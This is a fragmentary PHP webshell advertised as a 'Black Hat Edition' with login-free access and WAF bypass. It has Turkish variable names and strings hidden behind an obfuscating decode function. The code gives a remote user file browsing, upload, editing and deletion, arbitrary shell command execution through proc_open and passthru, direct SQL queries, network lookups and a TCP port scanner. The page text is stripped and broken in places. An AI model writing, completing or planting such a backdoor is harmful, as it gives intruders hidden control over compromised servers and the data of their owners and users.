Black Hat Edition - Professional Webshell (Giriş Yok - Direkt Erişim) - WAF Bypassed ( 더욱 더욱 강화 )
Safe_mode: Php version : cURL: MYSQL: MSSQL: PostgreSQL: Oracle: Disable functions :
"; $dosyalar = scandir($dizin); foreach ($dosyalar as $dosya) { if ($dosya != "." && $dosya != "..") { $tam_yol = $dizin . "/" . $dosya; $izinler = substr(sprintf('%o', fileperms($tam_yol)), -4); $tip = is_dir($tam_yol) ? moriarti_decode($directory_text) : moriarti_decode($file_text); $boyut = is_dir($tam_yol) ? '-' : filesize($tam_yol) . ' bytes'; echo $tip . " " . htmlspecialchars($dosya) . " (" . moriarti_decode($permissions_text) . $izinler . ", " . moriarti_decode($size_text) . $boyut . ") "; echo " [" . moriarti_decode($delete_text) . "]"; echo " [" . moriarti_decode($copy_text) . "]"; echo " [" . moriarti_decode($edit_text) . "]"; echo ""; } else { echo "
"; } } echo "
" . moriarti_decode($not_file_dir_error) . "
"; } } ?> " . moriarti_decode($delete_success_text) . htmlspecialchars(basename($dosya_yolu)) . ""; } else { echo "" . moriarti_decode($delete_error_text) . htmlspecialchars(basename($dosya_yolu)) . "
"; } } elseif (is_dir($dosya_yolu)) { if (@rmdir($dosya_yolu)) { echo "" . moriarti_decode($dir_delete_success_text) . htmlspecialchars(basename($dosya_yolu)) . "
"; } else { echo "" . moriarti_decode($dir_delete_error_text) . htmlspecialchars(basename($dosya_yolu)) . "
"; } } else { echo "" . moriarti_decode($not_file_dir_error) . "
"; } } else { echo "" . moriarti_decode($invalid_path_error) . "
"; } } ?> " . moriarti_decode($copy_success_text) . htmlspecialchars(basename($dosya_yolu)) . " -> " . htmlspecialchars(basename($yeni_dosya_yolu)) . ""; } else { echo "" . moriarti_decode($copy_error_text) . htmlspecialchars(basename($dosya_yolu)) . "
"; } } else { echo "" . moriarti_decode($invalid_path_error) . "
"; } } ?> " . moriarti_decode($dir_create_success_text) . htmlspecialchars($yeni_dizin_yolu) . ""; } else { echo "" . moriarti_decode($dir_create_error_text) . "
"; } } ?>"; echo highlight_file($dosya_yolu, true) ? highlight_file($dosya_yolu, true) : htmlspecialchars(file_get_contents($dosya_yolu)); echo "
" . moriarti_decode($file_not_readable_error) . "
"; } } ?> " . moriarti_decode($invalid_path_error) . ""; } else { if (@file_put_contents($dosya_yolu, $dosya_icerigi) !== false) { echo "" . moriarti_decode($file_edit_success_text) . htmlspecialchars($dosya_yolu) . "
"; echo "Geri dön"; } else { echo "" . moriarti_decode($file_edit_error_text) . "
"; } } } ?>"; $output = ''; if ($stderr_bagli_tut) { $descriptors = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe to write to ); $process = proc_open(escapeshellcmd($komut), $descriptors, $pipes); if (is_resource($process)) { fclose($pipes[0]); // No data to send to stdin $output = stream_get_contents($pipes[1]); fclose($pipes[1]); $error_output = stream_get_contents($pipes[2]); fclose($pipes[2]); $return_value = proc_close($process); echo htmlspecialchars($output); if (!empty($error_output)) { echo "\nStderr:\n" . htmlspecialchars($error_output); } } else { echo "Komut yürütülemedi.
"; } } else { ob_start(); passthru(escapeshellcmd($komut), $return_var); $output = ob_get_clean(); echo htmlspecialchars($output); if ($return_var !== 0) { echo "\nKomut hata kodu ile sonlandı: " . $return_var . ""; } } echo "
" . moriarti_decode($upload_success_text) . htmlspecialchars($hedef_yol) . "
"; } else { echo "" . moriarti_decode($upload_error_text) . "
"; } } else { echo "" . moriarti_decode($upload_select_error_text) . "
"; } } } ?>" . moriarti_decode($file_edit_success_text) . htmlspecialchars($duzenlenecek_dosya) . "
"; } else { echo "" . moriarti_decode($file_edit_error_text) . "
"; } } } ?>" . moriarti_decode($permission_mode_text) . htmlspecialchars($izin_modu) . ""; } else { echo "
" . moriarti_decode($file_or_dir_not_found_error) . "
"; } } ?>"; echo highlight_file($kod_yolu, true); echo ""; } else { echo "
" . moriarti_decode($file_not_readable_error) . "
"; } } ?>" . moriarti_decode($sql_query_error) . mysqli_error($baglanti) . "
"; } else { if ($sonuc === true || $sonuc === false) { echo "" . moriarti_decode($sql_success_no_data) . mysqli_affected_rows($baglanti) . "
"; } else { echo ""; $alanlar = mysqli_fetch_fields($sonuc); echo "
" . htmlspecialchars($alan->name) . " | "; } echo "
---|
" . htmlspecialchars($deger) . " | "; } echo "
" . moriarti_decode($empty_command_error) . "
"; } } ?>"; @passthru("ping -c 3 " . escapeshellarg($ping_hedef)); echo "
"; @passthru("traceroute " . escapeshellarg($traceroute_hedef)); echo "
"; @passthru("whois " . escapeshellarg($whois_hedef)); echo "
"; @passthru("nslookup " . escapeshellarg($nslookup_hedef)); echo "
"; set_time_limit(60); // Tarama için zaman sınırı for ($port = $baslangic_port; $port <= $bitis_port; $port++) { $servis_adi = getservbyport($port, 'tcp'); $servis_adi = $servis_adi ? $servis_adi : moriarti_decode($unknown_service_text); $fp = @fsockopen($hedef_ip, $port, $errno, $errstr, 1); if ($fp) { echo "Port " . $port . " (" . $servis_adi . "): " . moriarti_decode($open_text) . "\n"; fclose($fp); } else { echo "Port " . $port . " (" . $servis_adi . "): " . moriarti_decode($closed_text) . "\n"; } } echo "
: HTTP User-Agent Başlığı (Mevcut):